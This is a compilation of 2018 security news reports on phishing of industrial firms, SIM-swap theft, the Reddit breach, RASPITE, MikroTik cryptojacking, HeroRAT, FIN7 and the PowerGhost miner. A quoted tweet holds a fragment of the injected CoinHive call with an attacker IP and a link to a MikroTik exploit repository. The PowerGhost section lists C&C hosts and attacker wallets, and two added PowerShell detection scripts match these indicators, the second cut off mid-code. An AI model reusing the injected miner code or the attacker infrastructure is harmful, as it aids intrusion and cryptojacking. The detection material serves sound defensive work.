This research demonstrates once again that even when they use simple techniques and known malware, threat actors can successfully attack many industrial companies by expertly using social engineering and masking malicious code in target systems. Criminals actively use social engineering to keep users from suspecting that their computers are infected. They also use legitimate remote administration software to evade detection by antivirus solutions.

This series of attacks targets primarily Russian organizations, but the same tactics and tools can be used in attacks against industrial companies in any country of the world.

We believe that the threat actor behind this attack is highly likely to be a criminal group whose members have a good command of Russian. This is indicated by the high level at which texts in Russian are prepared for phishing emails used in the attack, as well as the attackers’ ability to make changes to organizations’ financial data in Russian. More data about the research on the infrastructure and language used by the attackers is available in the private version of the report on the Threat Intelligence portal.

Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines.

The various malware components used in this attack are detected by Kaspersky Lab products with the following verdicts:

Trojan.BAT.Starter
Trojan.Win32.Dllhijack
Trojan.Win32.Waldek
Backdoor.Win32.RA-based
Backdoor.Win32.Agent


Student Charged in Elaborate Digital Money Theft Scheme

3.8.2018 securityweek Hacking

LOS ANGELES (AP) — A Massachusetts college student who was named his high school's valedictorian for his savvy tech skills hacked into unsuspecting investors' personal cellphones, email and social media accounts to steal at least $2 million in digital currency like Bitcoin, according to documents provided by California prosecutors Wednesday.

Joel Ortiz was taken into custody July 12 at Los Angeles International Airport ahead of a flight to Boston, according to prosecutors. The 20-year-old faces more than two dozen charges including grand theft, identity theft and computer hacking, court documents show. He's held on $1 million bail.

The Santa Clara County, California, public defender's office, which is representing Ortiz, declined comment. A number listed for his home in Boston was disconnected.

The elaborate scheme involved taking over victims' phones, allowing him to reset passwords and access online accounts containing electronic assets in the form of Bitcoin, Coinbase, Bittrex and Binance, the criminal complaint said.

In one case Ortiz allegedly walked into an AT&T store and impersonated a victim in order to get a new SIM card, which gave him control of the victim's phone. He obtained access to the victim's "financial and personal identifying information, tax returns, private passwords" and siphoned $10,000 from a cryptocurrency account, according to a police report.

In several instances Ortiz allegedly impersonated victims over text messages and convinced friends and family members to "loan" him digital funds, court documents said.

At one point Ortiz allegedly stole $10,000 from a California resident, and then tried to get more, calling the victim's wife and sending a text to the victim's daughter that said "TELL YOUR DAD TO GIVE US BITCOIN," the documents said.

Court documents identify more than 20 victims who live in California, and prosecutors say they know of additional victims outside of the state.

Ortiz enrolled at the University of Massachusetts Boston and studies information technology, said school spokesman DeWayne Lehman.

Ortiz was the 2016 valedictorian of Another Course to College, a small public college preparatory school in Boston, and was honored alongside other top students across the city at a luncheon that year with Democratic Mayor Marty Walsh and other officials at a downtown hotel.

At his school, Ortiz was the lead robot software programmer on its robotics team, taught other students the basics of software coding and "led efforts to teach computer science," according to a Boston Public Schools' press release touting the students' accomplishments.

The school system said Ortiz "loves science and technology," is fluent in Spanish and speaks conversational Chinese.

Boston Public Schools spokesman Daniel O'Brien declined to comment.


Cisco to Acquire Duo Security for $2.35 Billion in Cash

3.8.2018 securityweek IT

Cisco announced on Thursday that it will pay $2.35 billion in cash to acquire cloud-based identity and access management solutions provider Duo Security.

Ann Arbor, Michigan-based Duo raised $70 million in Series D funding in October 2017, which valued the company at $1.17 billion at the time.

Through its flagship two-factor authentication (2FA) app, Duo's "Trusted Access" product suite helps verify the identity of users, and the health of their devices, before granting them access to applications. The platform supports Macs, PCs and mobile devices, and gives administrators visibility into end user devices accessing the corporate network.

“Integration of Cisco's network, device and cloud security platforms with Duo Security's zero-trust authentication and access products will enable Cisco customers to easily and securely connect users to any application on any networked device,” Cisco said.

Overall, Cisco says that by getting its hands on Duo’s technology, it will be able to extend intent-based networking into multi-cloud environments, simplify policy for cloud security, and expand endpoint visibility coverage.

The acquisition is expected to close during the first quarter of Cisco's fiscal year 2019, subject to customary closing conditions and required regulatory approvals.

Duo said previously that it has doubled its annual recurring revenue for the past four years, and currently has more than 500 employees globally, after doubling its headcount in 2016.

Duo serves more than 10,000 paying customers and says it protects more than 300 million logins worldwide every month. Customers include Facebook, Etsy, K-Swiss, Paramount Pictures, Toyota, Random House, Yelp, Zillow and more.

In addition to its Ann Arbor, Michigan headquarters, Duo currently maintains offices in Austin, Texas; San Mateo, California; and London, England.

Duo Security, which will continue to be led by Dug Song, Duo Security's co-founder and chief executive officer, will join Cisco's Networking and Security business led by EVP and GM David Goeckeler.

Cisco has acquired several emerging security companies over the years. In June 2015, it announced its acquisition of OpenDNS for $635 million. The move followed other acquisitions by Cisco in the security sector, including its acquisition of Portcullis, ThreatGRID, Neohapsis, Virtuata, and its $2.7 billion acquisition of Sourcefire in 2013. In June 2016, it agreed to pay $293 million to acquire cloud access security broker (CASB) CloudLock.


Attackers Circumvent Two Factor Authentication Protections to Hack Reddit

3.8.2018 securityweek Crypto

Popular Community Site Reddit Breached Through Continued Use of NIST-Deprecated SMS Two Factor Authentication (2FA)

Online community site Reddit announced Wednesday that it was breached in June 2018. In a refreshingly candid advisory, it provides a basic explanation of how the incident occurred, details on the extent of the breach, details on its own response, and advice to potential victims.

The extent of the breach was limited. It was discovered on June 19, and occurred between June 14 and June 18, this year. "A hacker broke into a few of Reddit's systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords," announced Chris Slowe, CTO and founding engineer at Reddit.

With more than 330 million active monthly users, Reddit is home to thousands of online communities where users can share stories and host public discussions.

Apart from the limited extent, it was also limited in scope. "The attacker did not gain write access to Reddit systems; they gained read-only access to some systems that contained backup data, source code and other logs." This comprises a complete copy of an old database backup including account credentials and email addresses (2005 to 2007); logs containing email digests sent between June 3 and June 17, 2018; and internal data such as source code, internal logs, configuration files and other employee workspace files.

"The disclosure of email addresses and their connected Reddit usernames," warns Jessica Ortega, a security researcher at SiteLock, "could potentially mean attackers can identify and dox users -- that is, release personally identifying information -- who rely on Reddit for discussing controversial topics or posting controversial images. It is recommended that all Reddit users update their passwords."

Reddit's response to the breach has been to report the incident to, and cooperate with, law enforcement; to contact users who may be impacted; and to strengthen its own privileged access controls with enhanced logging, more encryption and required token-based 2FA. It also advises all users to move to token-based 2FA.

This advice is because it believes the breach occurred through SMS intercept on one of its own employees. "We learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept."

This last comment has raised eyebrows. As long ago as 2016, NIST denounced SMS 2FA. "Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators," it stated in the DRAFT NIST Special Publication 800-63B.

The most common attack against SMS 2FA, explains Joseph Kucic, CSO at Cavirin, is mobile device malware designed to capture/intercept SMS messages -- a major feature for use against mobile banking apps. But, he adds, "SMS messages have had other risks: SIM swap and unauthorized access from SS7 (core telco signaling environments) -- these issues have been known and discussed in the security circles for years."

While Reddit doesn't make it clear whether the 'intercept' was via malware on an employee's mobile device or via flaws in the SS7 telecommunications protocol, the latter seems the most likely. SS7 is a telephony signaling protocol initially developed in 1975, and it has become deeply embedded in mobile telephone routing. As such it is unlikely to be corrected or replaced in the immediate future -- but the effect is that almost any mobile telephone conversation anywhere in the world can be intercepted by an advanced adversary.

The fact that SS7 attacks are not run-of-the-mill events makes Tom Kellermann, CSO at Carbon Black, wonder who might be behind the attack. "The Reddit breach seems to be more tradecraft-oriented," he told SecurityWeek. "They were victimized, but by whom: more than likely a nation-state given their capacity to influence Americans. I hope that they were not used to island hop into other victims' systems via a watering hole." According to Carbon Black research, 36% of cyberattacks attempt to leapfrog through the victims' systems into their customers' systems.

He is not alone in wondering if there may be more to this breach. "I am concerned that Reddit seems to be playing down the data breach as it was only read access to sensitive data and not write. This is positive news; however, it does not reduce the severity of the data breach when it relates to sensitive data," comments Joseph Carson, chief security scientist at Thycotic.

Of course, the attack may not have been effected via the SS7 flaws. "In this type of attack, the phone number is the weakest link," warns Tyler Moffit, senior threat research analyst at Webroot. "Cybercriminals can steal a victim's phone number by transferring it to a different SIM card with relative ease, thereby getting access to text messages and SMS-based authentication. For example, a cybercriminal would simply need to give a wireless provider an address, last 4 digits of a social security number, and perhaps a credit card to transfer a phone number. This is exactly the type of data that is widely available on the dark web thanks to large database breaches like Equifax."

"When Reddit started using SMS for Two Factor Authentication in 2003 it was a best practice," Joseph Kucic, CSO at Cavirin told SecurityWeek; adding, "The one fact about any security technology is that its effectiveness decreases over time for various reasons -- and one needs to take inventory of the deployed security effectiveness at least annually." He believes that security technologies, just like applications, have a product lifecycle, "and there is a point when an end-of-life should be declared before unauthorized individuals -- hackers or nation/state actors -- do it for you."

Reddit has earned plaudits for its breach notification as well as criticism for its continued use of SMS 2FA. "The level of detail Reddit provides," said Chris Morales, head of security analytics at Vectra, "is more than many larger organizations have provided on much more significant breaches. These details are based on an investigation and explain what happened during the breach -- how the attackers infiltrated the network and what exactly they gained access to -- and most importantly disclosed Reddit's internal processes to address the breach, including the hiring of new and expanded security staff."

Ilia Kolochenko, CEO at High-Tech Bridge, makes the point that despite Reddit's apparent openness, we still don't know everything about the breach. "Often, large-scale attacks are conducted in parallel by several interconnected cybercrime groups aimed to distract, confuse and scare security teams," he comments. "While attack vectors of the first group are being mitigated, others are actively exploited, often not without success. Otherwise, the disclosure and its timeline are done quite well by Reddit."

He also cautions against placing too much blame on Reddit's use of SMS 2FA. "I would refrain from blaming the 2FA SMS -- in many cases it's still better than nothing. Moreover, when most of business-critical applications have serious vulnerabilities varying from injections to RCE, 2FA hardening is definitely not the most important task to take care of."

Nevertheless, the consensus is that Reddit should be applauded for its disclosure, but censured for its use of SMS 2FA. "Reddit won't be the last organization to be breached via SMS authentication in the future," comments Sean Sullivan, security advisor at F-Secure. "At this point, the use of SMS-based MFA for administrators should be considered negligent."


Phishing Campaign Targets 400 Industrial Organizations

3.8.2018 securityweek Phishing

A new wave of spear-phishing emails masquerading as legitimate procurement and accounting letters has hit over 400 industrial organizations, according to Kaspersky Lab.

Data collected by Kaspersky showed that the malware associated with the campaign attacked nearly 800 company PCs across various industries. The attacks, which are ongoing, attempt to steal money and confidential data from the targeted organizations, which range from oil and gas to metallurgy, energy, construction and logistics.

The spear-phishing emails, Kaspersky’s security researchers discovered, are tailored with “content that corresponded to the profile of the attacked organizations and took into account the identity of the employee – the recipient of the letter.”

“This suggests that the attacks were carefully prepared and that criminals took the time to develop an individual letter for each user,” the researchers say.

The emails either contain malicious attachments designed to silently install modified legitimate software onto the victim’s machine, such as TeamViewer or Remote Manipulator System/Remote Utilities (RMS), or try to trick victims into following external links and downloading malicious objects from there.

Analysis of the attacks has revealed the use of various techniques to mask the presence of malware on the system. Incidents involving RMS software relied on exfiltrating data over email, while those abusing legitimate TeamViewer software sent the data directly to a command and control (C&C) server.

The main goal of these attacks is to steal money from the victim organizations’ accounts. After gaining access to a victim’s system and gathering the required information by accessing documents and financial and accounting software, the attackers would engage in various financial fraud operations, such as spoofing the bank details used to make payments.

When needed, the attackers would also upload additional malware onto the compromised machines, specifically crafted for each attack. They have been using spyware, remote administration tools to expand their control over the infected systems, Mimikatz, and malware to exploit different vulnerabilities in the operating system.

Some of the malicious programs found on compromised machines include the Babylon RAT, Betabot/Neurevt, AZORult stealer and Hallaj PRO Rat families. These allowed attackers to log keystrokes, take screenshots, collect system information, download additional malware, steal passwords and crypto-currency wallets, intercept traffic, and conduct distributed denial of service (DDoS) attacks.

In some attacks, the remote administration tool called RemoteUtilities was used to remotely control the infected system, transfer files, manage running applications, manage hardware, open a remote shell, capture screenshots and screen videos, and record audio and video.

While the attacks did not appear to concentrate on companies in a specific industry or sector, the actors did focus on compromising systems belonging to industrial companies. Furthermore, most of the organizations that were hit are located in Russia, Kaspersky said.

“The attackers demonstrated a clear interest in targeting industrial companies in Russia. Based on our experiences, this is likely to be due to the fact that their level of cybersecurity awareness is not as high as it is in other markets, such as financial services. That makes industrial companies a lucrative target for cybercriminals – not only in Russia, but across the world,” Vyacheslav Kopeytsev, security expert, Kaspersky Lab, said.


Iran-Linked Actor Targets U.S. Electric Utility Firms
3.8.2018 securityweek CyberSpy

Likely operating out of Iran, the Leafminer cyber-espionage group has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.

The group was previously said to have been targeting government and other types of organizations in the Middle East since at least early 2017, but it appears that its target list is much broader.

Dragos, which calls the actor RASPITE, says the entity has been targeting industrial control systems in numerous countries, including access operations in the electric utility sector in the United States.

Initial access to target networks is obtained through strategic website compromise (also known as watering hole attacks), the security firm says. Similar to the DYMALLOY and ALLANITE threat actors, the group embeds a link to a resource that prompts an SMB connection in order to harvest Windows credentials.

Next, the actor deploys scripts to install a malicious service that connects to the RASPITE-controlled infrastructure and provides remote access to the victim machine.

Although it did focus on ICS-operating entities, RASPITE has yet to demonstrate an ICS-specific capability. At the moment, there is no indication that the actor can launch destructive ICS attacks such as the widespread blackouts that hit Ukraine.

In a report on the group last week, Symantec revealed that both custom-built malware and publicly-available tools were leveraged in observed campaigns, including a modified version of Mimikatz. Some of the tools were linked to other groups apparently tied to Iran, Symantec said, noting that the actor appears to be inspired by the Russia-linked Dragonfly group.

“Dragos caught RASPITE early in its maturity which is ideal as it allows us to track its behavior and threat progression to help organizations defend against them. RASPITE uses common techniques which is good because defenders with sufficient monitoring can catch them and mitigate any opportunity for them to get better,” Sergio Caltagirone, Director of Threat Intelligence, Dragos, said.

“At this time we are limiting the amount of information in our public reports to avoid the proliferation of ideas or tradecraft to other activity groups,” Caltagirone continued.


Hundreds of thousands MikroTik Routers involved in massive Coinhive cryptomining campaign
3.8.2018 securityaffairs Cryptocurrency

Experts uncovered a massive cryptojacking campaign that is targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.
Security experts have uncovered a massive cryptojacking campaign that is targeting MikroTik routers. The hackers aim to change the configuration of the devices in order to inject a Coinhive cryptocurrency mining script into the users’ web traffic.

The campaign was first spotted by the researcher who goes by the Twitter handle MalwareHunterBR.

MalwareHunterBR (@MalwareHunterBR), 1:31 PM - Jul 30, 2018:
another mass exploitation against @mikrotik_com devices (https://github.com/mrmtwoj/0day-mikrotik …)
hxxp://170.79.26.28/
CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', #coinhive
According to Catalin Cimpanu from Bleeping Computer, the campaign first started in Brazil, but it is rapidly expanding to other countries targeting MikroTik routers all over the world.

The same campaign was monitored by the experts at Trustwave, who confirmed that the campaign initially targeted MikroTik routers used by Brazilians.

“On July 31st , just after getting back to the office from my talk at RSA Asia 2018 about how cyber criminals use cryptocurrencies for their malicious activities, I noticed a huge surge of CoinHive in Brazil.” reads the report published by Trustwave.

“After a quick look I saw that this is not your average garden variety website compromise, but that these were all MikroTik network devices.”

The experts noticed that the compromised devices were all using the same CoinHive sitekey, most of them in Brazil, which means that they were targeted by the same attackers.

MikroTik routers compromised

According to Trustwave the hackers were exploiting a zero-day flaw in the MikroTik routers to inject a copy of the Coinhive library in the traffic passing through the MikroTik router.

“Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited.” continues the analysis.

The vulnerability was discovered in April and patched by the vendor in just one day.

Technical details for the MikroTik flaw were publicly disclosed in May, and public proof-of-concept (PoC) code for the issue was published on GitHub.

Trustwave pointed out that many users who do not own MikroTik routers were affected too, because Internet providers and large organizations use MikroTik routers that were compromised by the hackers.

The experts noticed that once the threat actors realized they had been spotted, they switched tactics and injected the Coinhive script only into error pages returned by the routers.

After the initial phase, the campaign was targeting devices outside Brazil, and it has been estimated that roughly 170,000 MikroTik routers were compromised to inject the Coinhive script. The campaign can potentially compromise over a million MikroTik routers exposed on the Internet.

“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” conclude the experts.

“Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”


Analyzing the Telegram-based Android remote access trojan HeroRAT
3.8.2018 securityaffairs Android

Researchers at CSE Cybsec ZLab have published their analysis of the Telegram-based Android RAT tracked as HeroRAT.
In June, researchers from security firm ESET discovered a new family of Android Remote Administration Tool (RAT), dubbed HeroRAT, that leverages the Telegram BOT API to communicate with the attacker.

The use of the Telegram API can be considered an emerging trend in the Android RAT landscape: other RAT families implementing the same functionality, such as TeleRAT and IRRAT, were discovered in the wild before HeroRAT.

HeroRAT appeared very active in Iran where it was spreading through third-party app stores, through tainted social media and messaging apps.

ESET experts speculate that HeroRAT borrows the source code of a malware that appeared in the hacking community in March 2018; however, it has some characteristics that distinguish it from IRRAT and TeleRAT. One of these features is the use of the Xamarin Framework and the TeleSharp library for the development of the RAT.

HeroRAT is offered for sale on a dedicated Telegram channel, where the author offers three different variants depending on their functionality: bronze (25 USD), silver (50 USD) and gold panels (100 USD). The malware author also released a demo video in which he explains the RAT functionalities; below we have a screenshot from this demo video, showing the differences between the three variants.

Figure 1 – Differences between the RAT variants

Further details on the RAT analyzed by CSE Cybsec, including the IoCs and Yara rules, are available in the report published by the researchers at ZLab.


Three members of FIN7 (Carbanak) gang charged with stealing 15 million credit cards
3.8.2018 securityweek  CyberCrime

Three members of the cybercrime group tracked as FIN7 and Carbanak have been indicted and charged with 26 felony counts
Three members of the notorious cybercrime gang known as FIN7 and Carbanak have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The gang stole over a billion euros from banks across the world; the name “Carbanak” comes from the malware they used to compromise computers at banks and other financial institutions. The three suspects (Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kolpakov, 30) are Ukrainians; they were arrested last year in Europe between January and June.

Fedorov, a skilled hacker suspected of being a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently awaiting extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany; he is currently detained in Seattle pending trial. Hladyr is suspected of being a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain. He is suspected of being a supervisor of the group and is currently detained in Spain pending the United States’ request for extradition.

According to the DoJ, the suspects stole more than 15 million credit cards from over 6,500 individual point-of-sale terminals at 3,600 business locations in 47 states.

“Three high-ranking members of a sophisticated international cybercrime group operating out of Eastern Europe have been arrested and are currently in custody facing charges filed in U.S. District Court in Seattle, announced Assistant Attorney General Brian A.” reads the press release published by the DoJ.

“In the United States alone, FIN7 successfully breached the computer networks of companies in 47 states and the District of Columbia, stealing more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations.”

FIN7

“The three Ukrainian nationals indicted today allegedly were part of a prolific hacking group that targeted American companies and citizens by stealing valuable consumer data, including personal credit card information, that they then sold on the Darknet,” said Assistant Attorney General Benczkowski. “Because hackers are committed to finding new ways to harm the American public and our economy, the Department of Justice remains steadfast in its commitment to working with our law enforcement partners to identify, interdict, and prosecute those responsible for these threats.”
The trio has been accused of targeting hundreds of companies in the United States, and U.S. individuals. The list of victims is long and includes Chipotle Mexican Grill, Jason’s Deli, Sonic Drive-in, and Arby’s.

According to the European authorities, FIN7 developed a sophisticated banking trojan tracked as Cobalt, based on the Cobalt Strike penetration testing tool, that was spread through spear-phishing campaigns aimed at employees of different banks.

Once they had infected the victims’ PCs with the Carbanak malware, the hackers attempted to identify key people authorized to transfer money from the banks, in order to make transactions to fake accounts or ATMs under the control of the gang.

The three men could face many years in prison if convicted.


Alleged Iran-linked APT group RASPITE targets US electric utilities
3.8.2018 securityaffairs APT

According to the security firm Dragos, the RASPITE cyber-espionage group (aka Leafminer) has been targeting organizations in the United States, Europe, the Middle East, and East Asia.
Researchers from industrial cybersecurity firm Dragos reported that a group operating out of Iran, tracked as RASPITE, has been targeting entities in the United States, Europe, the Middle East, and East Asia.

The group has been active at least since 2017; researchers uncovered operations aimed at government and other types of organizations in the Middle East.

“Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE.” reads a blog post published by Dragos.

“Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicates the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time.”

Last week, experts from Symantec, who track the group as Leafminer, published a detailed report on the activity of the cyber espionage team, which leveraged both custom-built malware and publicly available tools in the observed campaigns.

According to Symantec, the extent of the campaigns conducted by the group could be wider: the researchers uncovered a list, written in Farsi, Iran’s language, of 809 targets whose systems were scanned by the attackers.

The list groups the organizations of interest by geography and industry; it includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Now researchers from Dragos have confirmed that RASPITE is behind attacks targeting industrial control systems in several states.

According to the experts, the hackers also accessed operations in the electric utility sector in the United States.

The hackers carry out watering hole attacks, leveraging compromised websites that provide content of interest to the potential victims.

RASPITE’s attacks resemble those conducted by other threat actors such as DYMALLOY and ALLANITE: the hackers inject into the compromised websites links to a resource that prompts an SMB connection, with the aim of harvesting Windows credentials.
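A host that follows an injected link to an external SMB share produces an outbound TCP 445 (or 139) connection to a public address, which is rarely legitimate from a workstation. The following PowerShell function, an added example that is not part of Dragos' or Symantec's reporting, scans firewall log lines for exactly that pattern. The log format, the internal addresses and the public addresses (RFC 5737 documentation ranges) are all constructed for the example; adapt the regex to your firewall's export format.

```powershell
# Added example: flag outbound SMB from internal hosts to public IP addresses.
# Not Dragos' or Symantec's code; the log format below is assumed for illustration.

function Test-PrivateIPv4 {
    param([string]$Address)
    $b = [System.Net.IPAddress]::Parse($Address).GetAddressBytes()
    # RFC 1918 ranges plus loopback count as internal
    return (($b[0] -eq 10) -or
            ($b[0] -eq 172 -and $b[1] -ge 16 -and $b[1] -le 31) -or
            ($b[0] -eq 192 -and $b[1] -eq 168) -or
            ($b[0] -eq 127))
}

function Find-OutboundSmb {
    param([string[]]$LogLines)
    # Assumed (constructed) log format:
    # <timestamp> <action> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
    $pattern = '^(?<ts>\S+)\s+(?<action>\S+)\s+(?<proto>TCP|UDP)\s+(?<src>[\d.]+):\d+\s+->\s+(?<dst>[\d.]+):(?<dport>\d+)$'
    foreach ($line in $LogLines) {
        if ($line -match $pattern) {
            if ($Matches.proto -ne 'TCP') { continue }
            if ($Matches.dport -notin @('445', '139')) { continue }
            # SMB to internal file servers is expected; only external destinations are interesting
            if (Test-PrivateIPv4 $Matches.dst) { continue }
            [pscustomobject]@{
                Timestamp   = $Matches.ts
                Source      = $Matches.src
                Destination = $Matches.dst
                Port        = [int]$Matches.dport
                Action      = $Matches.action
            }
        }
    }
}

# Constructed sample lines; 203.0.113.x, 198.51.100.x and 192.0.2.x are documentation ranges.
$sample = @(
    '2018-08-01T10:15:02Z ALLOW TCP 10.20.30.40:51234 -> 10.20.30.5:445',
    '2018-08-01T10:15:09Z ALLOW TCP 10.20.30.40:51240 -> 203.0.113.25:445',
    '2018-08-01T10:15:10Z ALLOW TCP 10.20.30.41:51300 -> 198.51.100.7:443',
    '2018-08-01T10:16:44Z DENY  TCP 10.20.30.42:51302 -> 192.0.2.77:139'
)

Find-OutboundSmb -LogLines $sample | Format-Table -AutoSize
```

On the sample above only the two connections to 203.0.113.25:445 and 192.0.2.77:139 are reported; the first line is SMB to an internal server and the third is HTTPS. An allowed hit is the one worth investigating, since the credential exchange has already happened by the time the connection is logged; a denied hit still tells you which host rendered the malicious page.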

Then, the attackers deploy scripts that install malware which connects to the C&C and gives the attacker control of the compromised machine.

RASPITE attacks

According to Dragos, although RASPITE has mainly focused on ICS operators, there is so far no evidence of destructive attacks on such devices.

“RASPITE’s activity to date currently focuses on initial access operations within the electric utility sector. Although focused on ICS-operating entities, RASPITE has not demonstrated an ICS-specific capability to date.” continues Dragos.

“This means that the activity group is targeting electric utilities, but there is no current indication the group has the capability of destructive ICS attacks including widespread blackouts like those in Ukraine.”

Sergio Caltagirone, Director of Threat Intelligence, Dragos, explained that his firm provided only limited information on the activity of the group to avoid “proliferation of ideas or tradecraft to other activity groups.”


A mining multitool

2.8.2018 Kaspersky  Cryptocurrency
Symbiosis of PowerShell and EternalBlue for cryptocurrency mining
Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system. It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans.

Technical description and propagation method
PowerGhost is an obfuscated PowerShell script that contains the core code and the following add-on modules: the actual miner, mimikatz, the libraries msvcp120.dll and msvcr120.dll required for the miner’s operation, a module for reflective PE injection and a shellcode for the EternalBlue exploit.

Fragment of the obfuscated script

The add-on modules encoded in base64

The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.

What the script does after that can be broken down into several stages:

Automatic self-update. PowerGhost checks if a new version is available on the C&C. If there is, it downloads the new version and launches it instead of itself.

Propagation. With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C. PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (MS17-010, CVE-2017-0144).

Escalation of privileges. As the miner spreads via mimikatz and WMI, it may end up on a new machine with user rights. It will then attempt to escalate its privileges in the system with the 32- or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120.

Establishing a foothold in the system. PowerGhost saves all the modules as properties of a WMI class. The miner’s body is saved in the form of a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

Payload. Lastly, the script launches the miner by loading a PE file via reflective PE injection.
In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services.

PowerShell function with the tell-tale name RunDDOS

It’s worth pointing out that this is the only one of the miner’s functions that copies files to the hard drive. This is quite possibly a test tool that will later be replaced with a fileless implementation. Also supporting the assertion that this function was added to this version as an afterthought is the peculiar way the DDoS module is launched: the script downloads two PE modules, logos.png and cohernece.txt. The former is saved to the hard drive as java-log-9527.log and is an executable file for conducting DDoS attacks. The file cohernece.txt is protected with the software protection tool Themida, complete with a check for execution in a virtual environment. If the check does not detect a sandbox, then cohernece.txt launches the file java-log-9527.log for execution. In this curious way, the ready DDoS module was supplemented with a function to check for execution in a virtual environment.

Fragment of disassembled code of the file cohernece.txt

Statistics and geography
Corporate users bore the brunt of the attack: it’s easier for PowerGhost to spread within a company’s local area network.

Geography of infections by the miner

PowerGhost is encountered most often in India, Brazil, Colombia and Turkey.

Kaspersky Lab’s products detect the miner and/or its components with the following verdicts:

PDM:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic
HEUR:Trojan.Win32.Generic
not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen
E-wallets at nanopool.org and minexmr.com:

43QbHsAj4kHY5WdWr75qxXHarxTNQDk2ABoiXM6yFaVPW6TyUJehRoBVUfEhKPNP4n3JFu2H3PNU2Sg3ZMK85tPXMzTbHkb
49kWWHdZd5NFHXveGPPAnX8irX7grcNLHN2anNKhBAinVFLd26n8gX2EisdakRV6h1HkXaa1YJ7iz3AHtJNK5MD93z6tV9H

Indicators of compromise
C&C hostnames:
update.7h4uk[.]com
185.128.43.62
info.7h4uk[.]com
MD5:
AEEB46A88C9A37FA54CA2B64AE17F248
4FE2DE6FBB278E56C23E90432F21F6C8
71404815F6A0171A29DE46846E78A079
81E214A4120A4017809F5E7713B7EAC8
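The indicators above are published in defanged form (update.7h4uk[.]com), so they have to be normalised before they can be matched against logs. The script below is an added example, not Kaspersky's code: it builds one regular expression from the C&C hostnames, the IP address, the two pool domains and the two wallet addresses, runs it over constructed DNS/proxy log lines, and also shows how to check files on disk against the MD5 list and running processes against the pool/wallet strings. The log lines and internal addresses are constructed; the indicators are the ones listed on the page.

```powershell
# Added example (not Kaspersky's code): match the PowerGhost indicators above against
# constructed log lines, files on disk and process command lines.

# Defanged hostnames are refanged by replacing "[.]" with "."
$cncHosts = @('update.7h4uk[.]com', 'info.7h4uk[.]com') | ForEach-Object { $_ -replace '\[\.\]', '.' }
$cncIPs   = @('185.128.43.62')
$pools    = @('nanopool.org', 'minexmr.com')
$wallets  = @(
    '43QbHsAj4kHY5WdWr75qxXHarxTNQDk2ABoiXM6yFaVPW6TyUJehRoBVUfEhKPNP4n3JFu2H3PNU2Sg3ZMK85tPXMzTbHkb',
    '49kWWHdZd5NFHXveGPPAnX8irX7grcNLHN2anNKhBAinVFLd26n8gX2EisdakRV6h1HkXaa1YJ7iz3AHtJNK5MD93z6tV9H'
)
$md5s = @(
    'AEEB46A88C9A37FA54CA2B64AE17F248', '4FE2DE6FBB278E56C23E90432F21F6C8',
    '71404815F6A0171A29DE46846E78A079', '81E214A4120A4017809F5E7713B7EAC8'
)

# One alternation of literal (escaped) indicators; -match is case-insensitive by default
$pattern = ($cncHosts + $cncIPs + $pools + $wallets | ForEach-Object { [regex]::Escape($_) }) -join '|'

function Find-IocInLogs {
    param([string[]]$LogLines)
    foreach ($line in $LogLines) {
        if ($line -match $pattern) {
            [pscustomobject]@{ Indicator = $Matches[0]; Line = $line }
        }
    }
}

function Find-IocHashes {
    param([string]$Path)
    # Get-FileHash returns upper-case hex; -in compares case-insensitively anyway
    Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue |
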